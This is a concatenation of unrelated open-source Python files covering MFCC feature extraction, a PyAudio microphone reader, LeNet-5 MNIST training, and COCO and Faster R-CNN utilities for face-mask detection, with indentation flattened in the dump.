fig.colorbar(mappable=heatmap)
plt.xlabel('Time(s)')
plt.ylabel(note)
plt.tight_layout()
plt.savefig(file_name)
# preemphasis config
alpha = 0.97
# Enframe config
frame_len = 400 # 25ms, fs=16kHz
frame_shift = 160 # 10ms, fs=16kHz
fft_len = 512
# Mel filter config
num_filter = 23
num_mfcc = 12
# Read wav file
wav, fs = librosa.load('./test.wav', sr=None)
# Enframe with Hamming window function
def preemphasis(signal, coeff=alpha):
"""perform preemphasis on the input signal.
:param signal: The signal to filter.
:param coeff: The preemphasis coefficient. 0 is no filter, default is 0.97.
:returns: the filtered signal.
"""
return np.append(signal[0], [signal[1:] - coeff * signal[:-1]])
def enframe(signal, frame_len=frame_len, frame_shift=frame_shift, win=np.hamming(frame_len)):
"""Enframe with Hamming widow function.
:param signal: The signal be enframed
:param win: window function, default Hamming
:returns: the enframed signal, num_frames by frame_len array
"""
num_samples = signal.size
num_frames = np.floor((num_samples - frame_len) / frame_shift) + 1
frames = np.zeros((int(num_frames), frame_len))
for i in range(int(num_frames)):
frames[i, :] = signal[i * frame_shift:i * frame_shift + frame_len]
frames[i, :] = frames[i, :] * win
return frames
def get_spectrum(frames, fft_len=fft_len):
"""Get spectrum using fft
:param frames: the enframed signal, num_frames by frame_len array
:param fft_len: FFT length, default 512
:returns: spectrum, a num_frames by fft_len/2+1 array (real)
"""
cFFT = np.fft.fft(frames, n=fft_len)
valid_len = int(fft_len / 2) + 1
spectrum = np.abs(cFFT[:, 0:valid_len])
return spectrum # num_frames*valid_len
def fbank(spectrum, num_filter=num_filter):
"""Get mel filter bank feature from spectrum
:param spectrum: a num_frames by fft_len/2+1 array(real)
:param num_filter: mel filters number, default 23
:returns: fbank feature, a num_frames by num_filter array
DON'T FORGET LOG OPERATION AFTER MEL FILTER!
"""
feats = np.zeros((int(fft_len / 2 + 1), num_filter))
"""
FINISH by YOURSELF
"""
    # step 1: center frequencies of the filters, evenly spaced on the mel scale
low_mel_freq = 0.0
high_mel_freq = 2595 * np.log10(1 + (fs / 2) / 700)
mel_points = np.linspace(low_mel_freq, high_mel_freq, num_filter + 2)
    # step 2: convert the mel points back to Hz
fft_points = 700 * (10 ** (mel_points / 2595) - 1)
    # # step 3 (unused): power spectrum of the frames
    # pow_frames = ((1.0 / fft_len) * (spectrum ** 2))
    # step 3: build the triangular mel filter bank
bin = (fft_points / (fs / 2)) * (fft_len / 2)
for i in range(1, num_filter + 1):
left = int(bin[i - 1])
center = int(bin[i])
right = int(bin[i + 1])
for j in range(left, center):
feats[j + 1, i - 1] = (j + 1 - bin[i - 1]) / (bin[i] - bin[i - 1])
for k in range(center, right):
            feats[k + 1, i - 1] = (bin[i + 1] - (k + 1)) / (bin[i + 1] - bin[i])
    # step 4: apply the mel filter bank and take the log
feats = np.dot(spectrum, feats)
feats = 20 * np.log10(feats)
# pdb.set_trace()
return feats
def mfcc(fbank, num_mfcc=num_mfcc):
"""Get mfcc feature from fbank feature
:param fbank: a num_frames by num_filter array(real)
:param num_mfcc: mfcc number, default 12
:returns: mfcc feature, a num_frames by num_mfcc array
"""
# feats = np.zeros((fbank.shape[0], num_mfcc))
"""
FINISH by YOURSELF
"""
def selfdct(x, axis=1, norm="ortho"):
"""scipy.pack.fft.dct()中离散余弦变换的python实现"""
y = np.zeros(x.shape, dtype=float)
if axis == 0:
N = y.shape[0]
for i in range(y.shape[1]):
for j in range(y.shape[0]):
for k in range(y.shape[0]):
y[j][i] += x[k][i] * np.cos(np.pi * j * (2 * k + 1) / (2 * N))
if norm == "ortho":
y[0, i] = 2 * y[0, i] / np.sqrt(4 * N)
                    y[1:, i] = 2 * y[1:, i] / np.sqrt(2 * N)
else:
y[:, i] = 2 * y[:, i]
elif axis == 1:
N = y.shape[1]
for i in range(y.shape[0]):
for j in range(y.shape[1]):
for k in range(y.shape[1]):
y[i][j] += x[i][k] * np.cos(np.pi * j * (2 * k + 1) / (2 * N))
if norm == "ortho":
y[i, 0] = 2 * y[i, 0] / np.sqrt(4 * N)
y[i, 1:] = 2 * y[i, 1:] / np.sqrt(2 * N)
else:
y[i, :] = 2 * y[i, :]
else:
raise ValueError("需要指定dct计算的维度,axis=0 or 1 ...")
return y
feats = selfdct(fbank, axis=1, norm='ortho')[:, 1:num_mfcc+1]
return feats
def write_file(feats, file_name):
"""Write the feature to file
:param feats: a num_frames by feature_dim array(real)
:param file_name: name of the file
"""
f = open(file_name, 'w')
(row, col) = feats.shape
for i in range(row):
f.write('[')
for j in range(col):
f.write(str(feats[i, j]) + ' ')
f.write(']\n')
f.close()
def main():
wav, fs = librosa.load('./test.wav', sr=None)
signal = preemphasis(wav)
frames = enframe(signal)
spectrum = get_spectrum(frames)
fbank_feats = fbank(spectrum)
mfcc_feats = mfcc(fbank_feats)
# print("fbank_feats", fbank_feats[0])
# print("mfcc_feats", mfcc_feats[0])
plot_spectrogram(fbank_feats, 'Filter Bank', 'fbank.png')
write_file(fbank_feats, './test.fbank')
plot_spectrogram(mfcc_feats.T, 'MFCC', 'mfcc.png')
write_file(mfcc_feats, './test.mfcc')
if __name__ == '__main__':
main()
```
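The nested `selfdct` above is intended to reproduce the orthonormal type-II DCT. Since it is only reachable through `mfcc`, one way to sanity-check it (assuming SciPy is available and the module-level definitions above are in scope) is to compare the whole `mfcc` output against `scipy.fftpack.dct` on a random fbank-shaped matrix:
```python
import numpy as np
from scipy.fftpack import dct

fake_fbank = np.random.RandomState(0).rand(5, num_filter)        # 5 frames, num_filter mel channels
ours = mfcc(fake_fbank)                                          # goes through the nested selfdct along axis=1
ref = dct(fake_fbank, type=2, axis=1, norm='ortho')[:, 1:num_mfcc + 1]
print(np.allclose(ours, ref))                                    # expected: True
```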
#### File: ASR_Course_Homework/05-GMM-HMM/convert_fmt.py
```python
from __future__ import print_function
import sys
def usage() :
print("convert_fmt.py : convert e6897 dcd fmt to evaluation fmt")
print(" usage : python convert_fmt.py e6870_fmt eva_fmt")
if __name__ == '__main__':
if len(sys.argv) == 1 :
usage()
sys.exit(0)
dcd_file = sys.argv[1]
eva_file = sys.argv[2]
with open(eva_file,'w') as eva_f:
for line in open(dcd_file, 'r') :
array = line.rstrip('\n').split()
out_array = [array[-1]] + [ i for i in array[:-1] if i !='~SIL']
eva_f.write(' '.join(out_array) + '\n')
``` |
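The conversion only re-orders tokens: the utterance id is moved from the last column to the front and `~SIL` tokens are dropped. The same transformation on a single made-up line:
```python
line = "~SIL HELLO WORLD ~SIL utt_001\n"
array = line.rstrip('\n').split()
out_array = [array[-1]] + [i for i in array[:-1] if i != '~SIL']
print(' '.join(out_array))   # -> "utt_001 HELLO WORLD"
```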
{
"source": "jinsongpan/NeMo",
"score": 2
} |
#### File: nlp/text_classification/model_parallel_text_classification_evaluation.py
```python
import pytorch_lightning as pl
from omegaconf import DictConfig
from nemo.collections.nlp.models.text_classification import TextClassificationModel
from nemo.collections.nlp.parts.nlp_overrides import NLPDDPPlugin
from nemo.core.config import hydra_runner
from nemo.utils import logging
from nemo.utils.exp_manager import exp_manager
@hydra_runner(config_path="conf", config_name="text_classification_config")
def main(cfg: DictConfig) -> None:
logging.info(f'\nConfig Params:\n{cfg.pretty()}')
trainer = pl.Trainer(plugins=[NLPDDPPlugin()], **cfg.trainer)
exp_manager(trainer, cfg.get("exp_manager", None))
model = TextClassificationModel.restore_from(cfg.model.nemo_path, trainer=trainer)
model.setup_test_data(test_data_config=cfg.model.test_ds)
trainer.test(model=model, ckpt_path=None)
if __name__ == '__main__':
main()
``` |
{
"source": "jinsongpan/Realtime_PyAudio_FFT",
"score": 3
} |
#### File: Realtime_PyAudio_FFT/src/stream_reader_pyaudio.py
```python
import numpy as np
import pyaudio
import time, sys, math
from collections import deque
from src.utils import *
class Stream_Reader:
"""
The Stream_Reader continuously reads data from a selected sound source using PyAudio
Arguments:
device: int or None: Select which audio stream to read .
rate: float or None: Sample rate to use. Defaults to something supported.
updatesPerSecond: int: How often to record new data.
"""
def __init__(self,
device = None,
rate = None,
updates_per_second = 1000,
FFT_window_size = None,
verbose = False):
self.rate = rate
self.verbose = verbose
self.pa = pyaudio.PyAudio()
#Temporary variables #hacks!
self.update_window_n_frames = 1024 #Don't remove this, needed for device testing!
self.data_buffer = None
self.device = device
if self.device is None:
self.device = self.input_device()
if self.rate is None:
self.rate = self.valid_low_rate(self.device)
self.update_window_n_frames = round_up_to_even(self.rate / updates_per_second)
self.updates_per_second = self.rate / self.update_window_n_frames
self.info = self.pa.get_device_info_by_index(self.device)
self.data_capture_delays = deque(maxlen=20)
self.new_data = False
if self.verbose:
self.data_capture_delays = deque(maxlen=20)
self.num_data_captures = 0
self.stream = self.pa.open(
format = pyaudio.paInt16,
channels = 1,
rate = self.rate,
input=True,
frames_per_buffer = self.update_window_n_frames,
stream_callback=self.non_blocking_stream_read)
print("\n##################################################################################################")
print("\nDefaulted to using first working mic, Running on:")
self.print_mic_info(self.device)
print("\n##################################################################################################")
print('Recording from %s at %d Hz\nUsing (non-overlapping) data-windows of %d samples (updating at %.2ffps)'
%(self.info["name"],self.rate, self.update_window_n_frames, self.updates_per_second))
def non_blocking_stream_read(self, in_data, frame_count, time_info, status):
if self.verbose:
start = time.time()
if self.data_buffer is not None:
self.data_buffer.append_data(np.frombuffer(in_data, dtype=np.int16))
self.new_data = True
if self.verbose:
self.num_data_captures += 1
self.data_capture_delays.append(time.time() - start)
return in_data, pyaudio.paContinue
def stream_start(self, data_windows_to_buffer = None):
        if data_windows_to_buffer is None:
self.data_windows_to_buffer = int(self.updates_per_second / 2) #By default, buffer 0.5 second of audio
else:
self.data_windows_to_buffer = data_windows_to_buffer
self.data_buffer = numpy_data_buffer(self.data_windows_to_buffer, self.update_window_n_frames)
print("\n--🎙 -- Starting live audio stream...\n")
self.stream.start_stream()
self.stream_start_time = time.time()
def terminate(self):
print("👋 Sending stream termination command...")
self.stream.stop_stream()
self.stream.close()
self.pa.terminate()
def valid_low_rate(self, device, test_rates = [44100, 22050]):
"""Set the rate to the lowest supported audio rate."""
for testrate in test_rates:
if self.test_device(device, rate=testrate):
return testrate
#If none of the test_rates worked, try the default rate:
self.info = self.pa.get_device_info_by_index(device)
default_rate = int(self.info["defaultSampleRate"])
if self.test_device(device, rate=default_rate):
return default_rate
print("SOMETHING'S WRONG! I can't figure out a good sample-rate for DEVICE =>", device)
return default_rate
def test_device(self, device, rate=None):
"""given a device ID and a rate, return True/False if it's valid."""
try:
self.info = self.pa.get_device_info_by_index(device)
if not self.info["maxInputChannels"] > 0:
return False
if rate is None:
rate = int(self.info["defaultSampleRate"])
stream = self.pa.open(
format = pyaudio.paInt16,
channels = 1,
input_device_index=device,
frames_per_buffer=self.update_window_n_frames,
rate = rate,
input = True)
stream.close()
return True
except Exception as e:
#print(e)
return False
def input_device(self):
"""
See which devices can be opened for microphone input.
Return the first valid device
"""
mics=[]
for device in range(self.pa.get_device_count()):
if self.test_device(device):
mics.append(device)
if len(mics) == 0:
print("No working microphone devices found!")
sys.exit()
print("Found %d working microphone device(s): " % len(mics))
for mic in mics:
self.print_mic_info(mic)
return mics[0]
def print_mic_info(self, mic):
mic_info = self.pa.get_device_info_by_index(mic)
print('\nMIC %s:' %(str(mic)))
for k, v in sorted(mic_info.items()):
print("%s: %s" %(k, v))
``` |
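The reader relies on PyAudio's callback mode: the callback gets raw bytes and must return `(data, flag)`. A stripped-down sketch of the same pattern (rate and buffer size are arbitrary here, and a working default input device is assumed):
```python
import time
import numpy as np
import pyaudio

frames_seen = 0

def callback(in_data, frame_count, time_info, status):
    # convert the raw 16-bit samples to numpy, count them, and keep the stream running
    global frames_seen
    frames_seen += len(np.frombuffer(in_data, dtype=np.int16))
    return in_data, pyaudio.paContinue

pa = pyaudio.PyAudio()
stream = pa.open(format=pyaudio.paInt16, channels=1, rate=44100, input=True,
                 frames_per_buffer=1024, stream_callback=callback)
stream.start_stream()
time.sleep(1.0)                        # let the callback run for about a second
stream.stop_stream(); stream.close(); pa.terminate()
print("samples captured in ~1 s:", frames_seen)
```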
{
"source": "jinsoo9595/LeNet_5-pytorch",
"score": 3
} |
#### File: jinsoo9595/LeNet_5-pytorch/main.py
```python
from lenet import LeNet5
import torch
import torch.nn as nn
import torch.optim as optim
from torchvision.datasets.mnist import MNIST
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import visdom
import onnx
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
from sklearn.manifold import TSNE
import seaborn as sns
# Pytorch visualization tool
viz = visdom.Visdom()
# Visdom plot setting
cur_batch_window = None
cur_batch_window_opts = {
'title': 'Epoch Loss Trace',
'xlabel': 'Batch Number',
'ylabel': 'Loss',
'width': 1200,
'height': 600,
}
# Resize MNIST data size to 32x32
data_train = MNIST('./data/mnist',
download=True,
transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor()]))
data_test = MNIST('./data/mnist',
train=False,
download=True,
transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor()]))
# Dataloader
# - dataset
# - shuffle(bool): to have the data reshuffled at every epoch
# - num_workers: how many subprocesses to use for data loading
data_train_loader = DataLoader(data_train, batch_size=256, shuffle=True, num_workers=8)
data_test_loader = DataLoader(data_test, batch_size=1024, num_workers=8)
# constructor of class
net = LeNet5()
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=2e-3)
activation = {}
def get_activation(name):
def hook(model, input, output):
activation[name] = output.detach()
return hook
def feature_map_vis(epoch, num):
act = activation['c1'].squeeze()
fig, axarr = plt.subplots(act.size(1), 10)
# title for entire figure
fig.suptitle('LeNet-5 feature map', fontsize=20)
for idx1 in range(10):
for idx2 in range(act.size(1)):
axarr[idx2, idx1].imshow(act[idx1, idx2, :, :], cmap='gray')
fig.savefig('./Feature_map/Feature Map ' + str(epoch) + '_' + str(num) + '.png')
def t_SNE(output, labels, epoch, num):
#extract last features only
tsne = TSNE(n_components=2, perplexity=10, n_iter=300)
tsne_ref = tsne.fit_transform(output.detach().numpy())
df = pd.DataFrame(tsne_ref, index=tsne_ref[0:,1])
df['_DIM_1_'] = tsne_ref[:,0]
df['_DIM_2_'] = tsne_ref[:,1]
df['Label'] = labels[:]
sns.set_context("notebook", font_scale=1.1)
sns.set_style("ticks")
sns.lmplot(x='_DIM_1_',
y='_DIM_2_',
data=df,
fit_reg=False,
legend=True,
size=9,
hue='Label',
scatter_kws={"s":200, "alpha":0.3})
plt.title('t-SNE Results MNIST', weight='bold').set_fontsize('14')
plt.xlabel('Dimension 1', weight='bold').set_fontsize('10')
plt.ylabel('Dimension 2', weight='bold').set_fontsize('10')
    plt.show()
plt.savefig('./t_SNE/Classification ' + str(epoch) + '_' + str(num) + '.png')
def train(epoch):
global cur_batch_window
net.train()
loss_list, batch_list = [], []
for i, (images, labels) in enumerate(data_train_loader):
# optimizer init
optimizer.zero_grad()
net.c1.register_forward_hook(get_activation('c1'))
# LeNet5 processing
output = net(images)
# compare output & lables
loss = criterion(output, labels)
# loss & batch list add content
# detach(): same content, new Tensor with different require_grad(calculated log)
loss_list.append(loss.detach().cpu().item())
batch_list.append(i+1)
# Print params
if i % 10 == 0:
print('Train - Epoch %d, Batch: %d, Loss: %f' % (epoch, i, loss.detach().cpu().item()))
# Visualize conv filter (multiple subplots)
#feature_map_vis(epoch,i)
# classification analysis
#t_SNE(output, labels, epoch, i)
# Update Visualization
if viz.check_connection():
cur_batch_window = viz.line(torch.Tensor(loss_list), torch.Tensor(batch_list),
win=cur_batch_window, name='current_batch_loss',
update=(None if cur_batch_window is None else 'replace'),
opts=cur_batch_window_opts)
loss.backward()
optimizer.step()
def test():
net.eval()
total_correct = 0
avg_loss = 0.0
for i, (images, labels) in enumerate(data_test_loader):
output = net(images)
avg_loss += criterion(output, labels).sum()
pred = output.detach().max(1)[1]
total_correct += pred.eq(labels.view_as(pred)).sum()
avg_loss /= len(data_test)
print('Test Avg. Loss: %f, Accuracy: %f' % (avg_loss.detach().cpu().item(), float(total_correct) / len(data_test)))
def train_and_test(epoch):
train(epoch)
test()
dummy_input = torch.randn(1, 1, 32, 32, requires_grad=True)
torch.onnx.export(net, dummy_input, "lenet.onnx")
onnx_model = onnx.load("lenet.onnx")
onnx.checker.check_model(onnx_model)
def main():
for e in range(1, 11):
train_and_test(e)
if __name__ == '__main__':
main()
``` |
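`register_forward_hook` is what makes the feature-map plots above possible: the hook fires on every forward pass and stashes the layer output. The same mechanism in miniature, on a throwaway conv layer:
```python
import torch
import torch.nn as nn

captured = {}

def hook(module, inputs, output):
    captured['c1'] = output.detach()    # keep a copy of the layer's activations

conv = nn.Conv2d(1, 6, kernel_size=5)
handle = conv.register_forward_hook(hook)
_ = conv(torch.randn(4, 1, 32, 32))     # the forward pass triggers the hook
handle.remove()
print(captured['c1'].shape)             # torch.Size([4, 6, 28, 28])
```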
{
"source": "JIN-strong/Mask_detection_pytorch_yolov3_fasterrcnn",
"score": 2
} |
#### File: Faster RCNN/faster_rcnn_utils/coco_utils.py
```python
import copy
import os
from PIL import Image
import torch
import torch.utils.data
import torchvision
from pycocotools import mask as coco_mask
from pycocotools.coco import COCO
import numpy as np
from . import transforms as T
class FilterAndRemapCocoCategories(object):
def __init__(self, categories, remap=True):
self.categories = categories
self.remap = remap
def __call__(self, image, target):
anno = target["annotations"]
anno = [obj for obj in anno if obj["category_id"] in self.categories]
if not self.remap:
target["annotations"] = anno
return image, target
anno = copy.deepcopy(anno)
for obj in anno:
obj["category_id"] = self.categories.index(obj["category_id"])
target["annotations"] = anno
return image, target
def convert_coco_poly_to_mask(segmentations, height, width):
masks = []
for polygons in segmentations:
rles = coco_mask.frPyObjects(polygons, height, width)
mask = coco_mask.decode(rles)
if len(mask.shape) < 3:
mask = mask[..., None]
mask = torch.as_tensor(mask, dtype=torch.uint8)
mask = mask.any(dim=2)
masks.append(mask)
if masks:
masks = torch.stack(masks, dim=0)
else:
masks = torch.zeros((0, height, width), dtype=torch.uint8)
return masks
class ConvertCocoPolysToMask(object):
def __call__(self, image, target):
w, h = image.size
image_id = target["image_id"]
image_id = torch.tensor([image_id])
anno = target["annotations"]
anno = [obj for obj in anno if obj['iscrowd'] == 0]
boxes = [obj["bbox"] for obj in anno]
# guard against no boxes via resizing
boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
boxes[:, 2:] += boxes[:, :2]
        boxes[:, 0::2].clamp_(min=0, max=w)
boxes[:, 1::2].clamp_(min=0, max=h)
classes = [obj["category_id"] for obj in anno]
classes = torch.tensor(classes, dtype=torch.int64)
segmentations = [obj["segmentation"] for obj in anno]
masks = convert_coco_poly_to_mask(segmentations, h, w)
keypoints = None
if anno and "keypoints" in anno[0]:
keypoints = [obj["keypoints"] for obj in anno]
keypoints = torch.as_tensor(keypoints, dtype=torch.float32)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
classes = classes[keep]
masks = masks[keep]
if keypoints is not None:
keypoints = keypoints[keep]
target = {}
target["boxes"] = boxes
target["labels"] = classes
target["masks"] = masks
target["image_id"] = image_id
if keypoints is not None:
target["keypoints"] = keypoints
# for conversion to coco api
area = torch.tensor([obj["area"] for obj in anno])
iscrowd = torch.tensor([obj["iscrowd"] for obj in anno])
target["area"] = area
target["iscrowd"] = iscrowd
return image, target
def _coco_remove_images_without_annotations(dataset, cat_list=None):
def _has_only_empty_bbox(anno):
return all(any(o <= 1 for o in obj["bbox"][2:]) for obj in anno)
def _count_visible_keypoints(anno):
return sum(sum(1 for v in ann["keypoints"][2::3] if v > 0) for ann in anno)
min_keypoints_per_image = 10
def _has_valid_annotation(anno):
# if it's empty, there is no annotation
if len(anno) == 0:
return False
# if all boxes have close to zero area, there is no annotation
if _has_only_empty_bbox(anno):
return False
        # the keypoint task has slightly different criteria for considering
        # an annotation valid
if "keypoints" not in anno[0]:
return True
# for keypoint detection tasks, only consider valid images those
# containing at least min_keypoints_per_image
if _count_visible_keypoints(anno) >= min_keypoints_per_image:
return True
return False
assert isinstance(dataset, torchvision.datasets.CocoDetection)
ids = []
for ds_idx, img_id in enumerate(dataset.ids):
ann_ids = dataset.coco.getAnnIds(imgIds=img_id, iscrowd=None)
anno = dataset.coco.loadAnns(ann_ids)
if cat_list:
anno = [obj for obj in anno if obj["category_id"] in cat_list]
if _has_valid_annotation(anno):
ids.append(ds_idx)
dataset = torch.utils.data.Subset(dataset, ids)
return dataset
def convert_to_coco_api(ds):
coco_ds = COCO()
# annotation IDs need to start at 1, not 0, see torchvision issue #1530
ann_id = 1
dataset = {'images': [], 'categories': [], 'annotations': []}
categories = set()
for img_idx in range(len(ds)):
# find better way to get target
# targets = ds.get_annotations(img_idx)
img, targets = ds[img_idx]
image_id = targets["image_id"].item()
img_dict = {}
img_dict['id'] = image_id
#print(img)
#img = np.array(img)
img_dict['height'] = img.shape[-2]
img_dict['width'] = img.shape[-1]
dataset['images'].append(img_dict)
bboxes = targets["boxes"]
bboxes[:, 2:] -= bboxes[:, :2]
bboxes = bboxes.tolist()
labels = targets['labels'].tolist()
areas = targets['area'].tolist()
iscrowd = targets['iscrowd'].tolist()
if 'masks' in targets:
masks = targets['masks']
# make masks Fortran contiguous for coco_mask
masks = masks.permute(0, 2, 1).contiguous().permute(0, 2, 1)
if 'keypoints' in targets:
keypoints = targets['keypoints']
keypoints = keypoints.reshape(keypoints.shape[0], -1).tolist()
num_objs = len(bboxes)
for i in range(num_objs):
ann = {}
ann['image_id'] = image_id
ann['bbox'] = bboxes[i]
ann['category_id'] = labels[i]
categories.add(labels[i])
ann['area'] = areas[i]
ann['iscrowd'] = iscrowd[i]
ann['id'] = ann_id
if 'masks' in targets:
ann["segmentation"] = coco_mask.encode(masks[i].numpy())
if 'keypoints' in targets:
ann['keypoints'] = keypoints[i]
ann['num_keypoints'] = sum(k != 0 for k in keypoints[i][2::3])
dataset['annotations'].append(ann)
ann_id += 1
dataset['categories'] = [{'id': i} for i in sorted(categories)]
coco_ds.dataset = dataset
coco_ds.createIndex()
return coco_ds
def get_coco_api_from_dataset(dataset):
for _ in range(10):
if isinstance(dataset, torchvision.datasets.CocoDetection):
break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return dataset.coco
return convert_to_coco_api(dataset)
class CocoDetection(torchvision.datasets.CocoDetection):
def __init__(self, img_folder, ann_file, transforms):
super(CocoDetection, self).__init__(img_folder, ann_file)
self._transforms = transforms
def __getitem__(self, idx):
img, target = super(CocoDetection, self).__getitem__(idx)
image_id = self.ids[idx]
target = dict(image_id=image_id, annotations=target)
if self._transforms is not None:
img, target = self._transforms(img, target)
return img, target
def get_coco(root, image_set, transforms, mode='instances'):
anno_file_template = "{}_{}2017.json"
PATHS = {
"train": ("train2017", os.path.join("annotations", anno_file_template.format(mode, "train"))),
"val": ("val2017", os.path.join("annotations", anno_file_template.format(mode, "val"))),
# "train": ("val2017", os.path.join("annotations", anno_file_template.format(mode, "val")))
}
t = [ConvertCocoPolysToMask()]
if transforms is not None:
t.append(transforms)
transforms = T.Compose(t)
img_folder, ann_file = PATHS[image_set]
img_folder = os.path.join(root, img_folder)
ann_file = os.path.join(root, ann_file)
dataset = CocoDetection(img_folder, ann_file, transforms=transforms)
if image_set == "train":
dataset = _coco_remove_images_without_annotations(dataset)
# dataset = torch.utils.data.Subset(dataset, [i for i in range(500)])
return dataset
def get_coco_kp(root, image_set, transforms):
return get_coco(root, image_set, transforms, mode="person_keypoints")
```
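The box handling in `ConvertCocoPolysToMask` converts COCO's `[x, y, w, h]` boxes to `[x1, y1, x2, y2]`, clamps them to the image, and drops degenerate boxes. The same few lines in isolation:
```python
import torch

w, h = 100, 80                                            # image width and height
boxes = torch.tensor([[10., 20., 30., 40.],               # ordinary xywh box
                      [95., 70., 20., 20.],               # spills over the image border
                      [50., 50., 0., 0.]])                # degenerate (zero area)
boxes[:, 2:] += boxes[:, :2]                              # xywh -> xyxy
boxes[:, 0::2].clamp_(min=0, max=w)
boxes[:, 1::2].clamp_(min=0, max=h)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
print(boxes[keep])                                        # the degenerate box is filtered out
```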
#### File: Mask_detection_pytorch_yolov3_fasterrcnn/Faster RCNN/pic.py
```python
import torch
import torchvision
from PIL import Image
import cv2
from faster_rcnn_utils.engine import evaluate
from faster_rcnn_utils.AIZOODataset import AIZOODataset
from faster_rcnn_utils.transforms import get_transform
from faster_rcnn_utils import utils
from torchvision.transforms import functional as F
import os
import time
import numpy as np
import argparse
import datetime
def py_cpu_nms(dets, thresh):
x1 = dets[:, 0].astype(int)
y1 = dets[:, 1].astype(int)
x2 = dets[:, 2].astype(int)
y2 = dets[:, 3].astype(int)
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= thresh)[0]
order = order[inds + 1]
return keep
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input_file_path", type=str, default="testing/input/images", help="path to images directory")
parser.add_argument("--output_path", type=str, default="testing/output/images", help="output image directory")
parser.add_argument("--model_def", type=str, default="config/yolov3_mask.cfg", help="path to model definition file")
parser.add_argument("--weights_path", type=str, default="checkpoints/yolov3_self.pth",help="path to weights file")
parser.add_argument("--class_path", type=str, default="data/mask_dataset.names", help="path to class label file")
parser.add_argument("--conf_thres", type=float, default=0.9, help="object confidence threshold")
parser.add_argument("--nms_thres", type=float, default=0.4, help="iou thresshold for non-maximum suppression")
parser.add_argument("--img_size", type=int, default=416, help="size of each image dimension")
opt = parser.parse_args()
print(opt)
# Output directory
os.makedirs(opt.output_path, exist_ok=True)
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
print("正在使用的设备是",device)
num_classes = 3
BATCH_SIZE = 1
model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False, progress=True, num_classes=num_classes, pretrained_backbone=True)
model.load_state_dict(torch.load("checkpoints_faster_rcnn/yolov3_ckpt_0__'1'.pth"))
model.to(device)
model.eval()
    # checking for GPU for Tensor
Tensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor
t_size = cv2.getTextSize(" ", cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]
for imagename in os.listdir(opt.input_file_path):
print("\n"+imagename+"_______")
image_path = os.path.join(opt.input_file_path, imagename)
org_img = cv2.imread(image_path)
i_height, i_width = org_img.shape[:2]
x = y = i_height if i_height > i_width else i_width
img = np.zeros((x, y, 3), np.uint8)
start_new_i_height = int((y - i_height) / 2)
start_new_i_width = int((x - i_width) / 2)
img[start_new_i_height: (start_new_i_height + i_height) ,start_new_i_width: (start_new_i_width + i_width) ] = org_img
img = cv2.resize(img, (opt.img_size, opt.img_size))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = np.asarray(img) / 255
img = np.transpose(img, [2, 0, 1])
img = np.expand_dims(img, axis=0)
img = torch.Tensor(img).to(device)
with torch.no_grad():
detections = model(img)
outputs = [{k: v.to(device) for k, v in t.items()} for t in detections]
id2class = {0: 'No Mask', 1: 'Mask'}
# For each detection in detections
detection = outputs[0]
mul_constant = x / opt.img_size
if detection is not None:
# for [x1, y1, x2, y2], conf, cls_pred in detection:
boxes = detection['boxes'].cpu().detach().numpy().astype(int)
labels = detection['labels'].cpu().detach().numpy()
scores = detection['scores'].cpu().detach().numpy()
all = np.c_[boxes,scores]
keep = py_cpu_nms(all, 0.1)
all = np.c_[boxes, labels,scores]
for i in keep:
if all[i][5]<0.2:
continue
x1 = int(all[i][0])
y1 = int(all[i][1])
x2 = int(all[i][2])
y2 = int(all[i][3])
if all[i][4] ==2:
labels = 1
else:
labels = 0
x1 = int(x1 * mul_constant - start_new_i_width)
y1 = int(y1 * mul_constant - start_new_i_height)
x2 = int(x2 * mul_constant - start_new_i_width)
y2 = int(y2 * mul_constant - start_new_i_height)
# Bounding box making and setting Bounding box title
if int(labels) == 0:
# WITH_MASK
cv2.rectangle(org_img, (x1, y1), (x2, y2), (0, 255, 0), 2)
else:
# WITHOUT_MASK
cv2.rectangle(org_img, (x1, y1), (x2, y2), (0, 0, 255), 2)
cv2.putText(org_img, id2class[int(labels)] + ": %.2f" % all[i][5], (x1, y1 + t_size[1]),
cv2.FONT_HERSHEY_PLAIN, 1,
[225, 255, 255], 2)
out_filepath = os.path.join(opt.output_path, imagename)
cv2.imwrite(out_filepath,org_img)
print("Done....")
cv2.destroyAllWindows()
``` |
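`py_cpu_nms` keeps only the highest-scoring box of each overlapping cluster. A toy run with two heavily overlapping detections and one separate one (with the function above in scope):
```python
import numpy as np

dets = np.array([[10, 10, 50, 50, 0.90],        # best box of the overlapping pair
                 [12, 12, 48, 52, 0.75],        # IoU ~0.8 with the first -> suppressed
                 [100, 100, 140, 140, 0.60]])   # far away -> kept
print(py_cpu_nms(dets, thresh=0.4))             # expected: [0, 2]
```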
{
"source": "jinsub1999/django_react_bootstrap",
"score": 2
} |
#### File: server/common/views.py
```python
from django.shortcuts import get_object_or_404, redirect, render
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
